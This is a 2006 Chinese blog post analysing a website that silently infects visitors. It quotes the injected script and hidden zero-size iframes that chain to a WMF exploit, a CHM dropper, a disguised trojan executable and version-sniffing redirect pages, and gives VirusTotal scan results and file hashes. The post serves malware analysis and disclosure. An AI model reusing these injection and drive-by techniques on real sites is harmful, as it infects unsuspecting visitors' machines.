一个会下载多个病毒的网站

endurer原创

2006-05-10第1版

在网站hxxp://www.***23down.cn 的代码中包含：

〈frame name="header" scrolling="no" noresize target="main" src="top.htm"〉

hxxp://www.***23down.cn/top.htm的代码中包含：

〈script language="javascript" type="text/javascript" src="hxxp://js.***a.dx03.51.la/1707.js"〉〈/script〉

〈script language=javascript src=hxxp://www.***475100.com/1.js〉〈/script〉

hxxp://www.***475100.com/1.js的代码中包含：

document.writeln("〈iframe id=\"baidufttrame\" border=\"0\" vspace=\"0\" hspace=\"0\" marginwidth=\"0\" marginheight=\"0\" framespacing=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"0\" height=\"0\" src=\"http:\/\/www.***475100.com\/bd\/index.htm\"〉〈\/iframe〉")

hxxp://www.***475100.com/bd/index.htm的代码：

〈iframe height="0" width="0" src="hxxp://www.***475100.com/mm.wmf"〉〈/iframe〉

〈iframe height="0" width="0" src="hxxp://www.***475100.com/bd/icyfox.htm"〉〈/iframe〉

〈iframe height="0" width="0" src="hxxp://www.***475100.com/xx/"〉〈/iframe〉

〈iframe src="mm.html" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉

〈iframe src="joke.htm" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉

〈iframe src="免费色情电影播放器.exe" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉

mm.wmf江民KV报为：Exploit.WMF.SetAbortProc

Complete scanning result of "mm.wmf", received in VirusTotal at 05.10.2006, 16:03:09 (CET).

Antivirus

Version

Update

Result

AntiVir

6.34.1.27

05.10.2006

EXP/MS06-001.WMF

Avast

4.6.695.0

05.10.2006

MS06-001 WMF Exploit

AVG

386

05.09.2006

May be infected by unknown virus Exploit.WMF

BitDefender

7.2

05.10.2006

Exploit.Win32.WMF-PFV

CAT-QuickHeal

8.00

05.09.2006

WMF.Exploit

ClamAV

devel-20060426

05.10.2006

Exploit.WMF.A

DrWeb

4.33

05.10.2006

Exploit.MS05-053

eTrust-InoculateIT

23.72.4

05.10.2006

Win32/Worfo.Variant!Trojan

eTrust-Vet

12.4.2203

05.10.2006

Win32/Worfo

Ewido

3.5

05.10.2006

Exploit.MS05-053-WMF

Fortinet

2.76.0.0

05.10.2006

suspicious

F-Prot

3.16c

05.09.2006

no virus found

Ikarus

0.2.65.0

05.10.2006

Exploit.IMG-WMF

Kaspersky

4.0.2.24

05.10.2006

Exploit.Win32.IMG-WMF.u

McAfee

4758

05.09.2006

Exploit-WMF

Microsoft

1.1372

05.10.2006

TrojanDownloader:Win32/Wmfpfv

NOD32v2

1.1529

05.10.2006

a variant of Win32/Exploit.WMF

Norman

5.90.17

05.10.2006

W32/Exploit.Gen

Panda

9.0.0.4

05.10.2006

Exploit/Metafile

Sophos

4.05.0

05.10.2006

Exp/WMF-A

Symantec

8.0

05.10.2006

Trojan.Ducky.B

TheHacker

5.9.7.141

05.10.2006

Exploit/WMF

UNA

1.83

05.06.2006

Exploit.WMF.IMG

VBA32

3.11.0

05.09.2006

Exploit.WMF

Aditional Information

File size: 17253 bytes

MD5: eeab0824a7a4e53dabddfc019501e5f5

SHA1: fce0693db77cb47025e707f682d9df33ab752f12

icyfox.htm江民KV报为：Exploit.MHtRedir

icyfox.htm会下载运行icyfox.js

icyfox.js是个CHM文件，会释放/运行EXE文件，江民KV2006-05-10的病毒库不能查杀

Complete scanning result of "icyfox.js", received in VirusTotal at 05.10.2006, 16:18:28 (CET).

Antivirus

Version

Update

Result

AntiVir

6.34.1.27

05.10.2006

TR/Dldr.Small.TZ.49

Avast

4.6.695.0

05.10.2006

Win32:Trojano-3583

AVG

386

05.09.2006

no virus found

BitDefender

7.2

05.10.2006

Trojan.Downloader.Small.NB

CAT-QuickHeal

8.00

05.09.2006

TrojanDownloader.Small.tz

ClamAV

devel-20060426

05.10.2006

no virus found

DrWeb

4.33

05.10.2006

Trojan.DownLoader.2791

eTrust-InoculateIT

23.72.4

05.10.2006

Win32/SillyDL.7fl!Trojan

eTrust-Vet

12.4.2203

05.10.2006

no virus found

Ewido

3.5

05.10.2006

no virus found

Fortinet

2.76.0.0

05.10.2006

no virus found

F-Prot

3.16c

05.09.2006

no virus found

Ikarus

0.2.65.0

05.10.2006

no virus found

Kaspersky

4.0.2.24

05.10.2006

Trojan-Downloader.Win32.Small.tz

McAfee

4758

05.09.2006

Exploit-CodeBase.chm

Microsoft

1.1372

05.10.2006

TrojanDownloader:Win32/Small!3817

NOD32v2

1.1529

05.10.2006

Win32/TrojanDownloader.Small.TZ

Norman

5.90.17

05.10.2006

no virus found

Panda

9.0.0.4

05.10.2006

Suspicious file

Sophos

4.05.0

05.10.2006

Troj/Small-BDM

Symantec

8.0

05.10.2006

no virus found

TheHacker

5.9.7.141

05.10.2006

no virus found

UNA

1.83

05.06.2006

no virus found

VBA32

3.11.0

05.09.2006

Trojan-Downloader.Win32.Small.tz

Aditional Information

File size: 9676 bytes

MD5: 2f3c8d0f3c5cc12cc221c78701811517

SHA1: 98b848f95f2319369837e0a7fb4d4c48dd6e59dd

joke.htm江民KV报为：Exploit.VBS.Phel.bc

免费色情电影播放器.exe包含三个文件：

lsasss.exe江民KV报为：Trojan/VB.Small.bi

QQ.Exe江民KV报为： TrojanDownloader.MiniQrz

hy.exe江民KV报为：TrojanDownloader.MiniQrz

hxxp://www.***475100.com/xx/的代码为：

〈script language=javascript〉ie='wxp';ver=navigator.appVersion;if(!(ver.indexOf('NT

5.0')==-1))ie='wnt';if(!(ver.indexOf('Windows

98')==-1)){ie='w98';}location.href=ie+'.htm';〈/script〉

根据Windows和IE的版本，相应的下载wxp.htm、wnt.htm或w98.htm

wxp.htm、wnt.htm或w98.htm的内容经过Encode()和Escape()加密，会下载/运行：

1) hxxp://www.***475100.com/xx//dongfang.gif

dongfang.gif是个用eval()加密的脚本。

2) 打开hxxp://www.***5173a.com/door/index.htm

hxxp://www.***5173a.com/door/index.htm的内容为：

〈script language=javascript〉ie='winxp';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';〈/script〉

〈script src='http://s37.cnzz.com/stat.php?id=121168&web_id=121168' language='JavaScript' charset='gb2312'〉〈/script〉

根据Windows和IE的版本，相应的下载winxp.htm、winnt.htm或w98.htm